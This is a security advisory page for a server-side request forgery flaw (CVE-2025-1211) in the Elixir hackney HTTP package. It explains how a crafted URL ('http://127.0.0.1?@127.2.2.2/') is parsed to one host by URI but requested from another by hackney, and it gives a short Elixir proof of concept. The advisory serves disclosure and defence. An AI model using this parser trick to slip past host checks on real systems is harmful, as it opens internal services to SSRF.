Server-side Request Forgery (SSRF) Affecting hackney package, versions >=0.0.0
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsSnyk Learn
Learn about Server-side Request Forgery (SSRF) vulnerabilities in an interactive lesson.
Start learning- Snyk IDSNYK-HEX-HACKNEY-6516131
- published10 Feb 2025
- disclosed13 Mar 2024
- creditSam Sanoop
Introduced: 13 Mar 2024
CVE-2025-1211 (opens in a new tab)How to fix?
There is no fixed version for hackney.
Overview
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to improper parsing of URLs by URI built-in module and hackey. Given the URL http://127.0.0.1?@127.2.2.2/, the URI function will parse and see the host as 127.0.0.1 (which is correct), and hackney will refer the host as 127.2.2.2/.
This vulnerability can be exploited when users rely on the URL function for host checking.
PoC
import :hackney
defmodule MyApp do
# Helper function to print the URL components
def parse_and_print_url() do
attack_string = "http://127.0.0.1?@127.2.2.2/"
uri = URI.parse(attack_string)
# Host
host = uri.host
IO.puts("Host: #{host}")
port = uri.port
IO.puts("Port: #{port}")
# httpc sends a request to the right url 127.0.0.1
# {:ok, {{:_, 200, _}, _, body}} = :httpc.request(:get, {attack_string, []}, [], [body_format: :binary])
# IO.puts("Response body: #{body}")
# http poison sends the request to 127.2.2.2
# HTTPoison.start
# HTTPoison.get! attack_string
# hackney which http poison uses sends the request to 127.2.2.2
:hackney.get(attack_string, [], "", async: :once)
end
end